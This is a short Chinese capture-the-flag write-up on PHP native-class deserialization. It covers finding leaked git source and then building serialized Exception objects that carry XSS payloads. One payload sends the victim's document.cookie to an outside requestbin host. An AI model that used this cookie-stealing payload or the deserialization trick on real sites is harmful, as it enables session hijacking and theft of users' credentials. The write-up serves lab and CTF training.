考点:PHP原生类反序列化
首先dirsearch一波扫发现git源码泄露,这里注意BUU上需要设置线程加上-s 0.5
接着githack一波down取源码,只有一个index.php文件
<?php
$a = $_GET[‘yds_is_so_beautiful’];
echo unserialize($a);
是个反序列化,经过一番搜索发现是原生类反序化
参考文章
本地构造payload并url
编码,传给yds_is_so_beautiful
<?php
$a = new Exception("<script>alert(1)</script>");
$b = serialize($a);
echo urlencode($b);
本地弹个窗F12在cookie中获得flag
或者利用http://http.requestbin.buuoj.cn平台
<?php $a = new Exception("<script>window.location.href=\"http://http.requestbin.buuoj.cn/1i5ahsg1?cookie=\"+escape(document[\"cookie\"])</script>"); $b = serialize($a); echo urlencode($b);
其中li5ahsg1自行根据获取修改,将结果传入在url处得到flag
